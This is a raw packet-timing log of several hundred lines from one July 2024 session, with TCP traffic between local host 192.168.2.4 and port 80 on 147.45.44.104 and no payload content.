Jul 26, 2024 18:56:47.054357052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.054378033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.054405928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.055361032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.055372953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.055382013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.055392981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.055402994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.055402994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.055413961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.055421114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.055449009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.056232929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.056245089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.056253910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.056267977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.056273937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.056278944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.056291103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.056298018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.056328058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.057074070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.057086945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.057096958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.057118893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.057146072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064260006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064325094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064563990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064578056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064613104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064646959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064713955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064733982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064744949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064754963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064759970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.064775944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064794064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.064814091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.179140091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179157019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179167986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179200888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.179239035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.179406881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179447889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.179471970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179483891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179493904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.179517984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.179543972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180155993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180170059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180180073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180191040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180198908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180202007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180222034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180243015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180773020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180788040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180797100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180808067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180816889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180819988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180830002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180834055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.180862904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.180874109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.181054115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.181066990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.181077003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.181087017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.181094885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.181099892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.181104898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.181126118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.181150913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.181994915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.182009935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.182020903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.182032108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.182038069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.182043076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.182051897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.182055950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.182080030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.182106972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.183501005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.183511972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.183521986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.183532000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.183542013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.183545113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.183556080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.183587074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.184564114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.184576988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.184586048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.184597969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.184607983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.184617996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.184623957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.184648991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.184664965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.185401917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.185412884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.185421944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.185432911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.185442924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.185448885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.185476065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.185487032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186062098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186074018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186083078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186093092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186103106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186108112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186113119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186131001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186151981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186758041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186769009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186777115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186785936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186796904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186805010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186806917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186819077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186825991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186830044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.186851978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.186877012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.187741041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.187752962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.187762022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.187772036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.187782049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.187792063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.187798023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.187812090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.187848091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.188643932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188656092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188664913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188676119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188684940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188687086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.188695908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188704014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.188708067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.188734055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.188745975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.189625025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189635992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189677000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.189851999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189862967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189878941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189889908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189888954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.189899921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189907074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.189914942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189925909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.189927101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.189956903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.190845966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.190862894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.190872908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.190882921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.190891981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.190893888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.190905094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.190907001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.190938950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.191788912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191801071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191809893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191818953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191828966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191832066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.191840887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191847086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.191854000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.191879034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.191894054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.193052053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193064928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193075895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193085909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193095922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.193095922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193109035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193114042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.193120003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193140030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.193154097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.193909883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193921089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193929911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193941116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193948030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.193950891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193964005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193972111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.193977118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.194006920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.266865015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.266881943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.266892910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267071009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.267122030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267133951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267143965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267168045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.267199993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.267656088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267669916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267715931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.267800093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267812967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267823935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267834902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.267848015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.267873049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268584013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268601894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268610954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268620968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268630028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268640041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268640995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268661976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268680096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268743038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268754005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268762112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268773079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268781900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268783092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268795013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268800020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268809080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268821001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268831015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268834114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268841982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268851995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268862009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268861055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268872023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268882990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268891096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.268902063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.268932104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.269180059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.269192934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.269202948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.269213915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.269221067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.269226074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.269241095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.269248962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.269274950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.270066977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270080090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270088911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270101070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270111084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270117998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.270122051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270133972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270137072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.270162106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.270176888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.270972967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270987034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.270994902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271007061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271018982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271023989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.271028996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271039963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271054983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.271075010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.271922112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271934032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271943092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271953106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271962881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271970034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.271975040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271986961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.271989107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.272006035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.272028923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.272861958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.272874117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.272882938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.272893906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.272902966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.272908926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.272913933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.272929907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.272944927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.272974968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.273792982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273806095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273814917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273825884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273834944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273840904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273849010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273855925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.273859978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.273880959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.273899078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.274622917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274637938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274648905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274661064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274667025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.274674892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274687052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274692059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.274698973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274710894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.274720907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.274738073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.274760962 CEST	49757	80	192.168.2.4	147.45.44.104
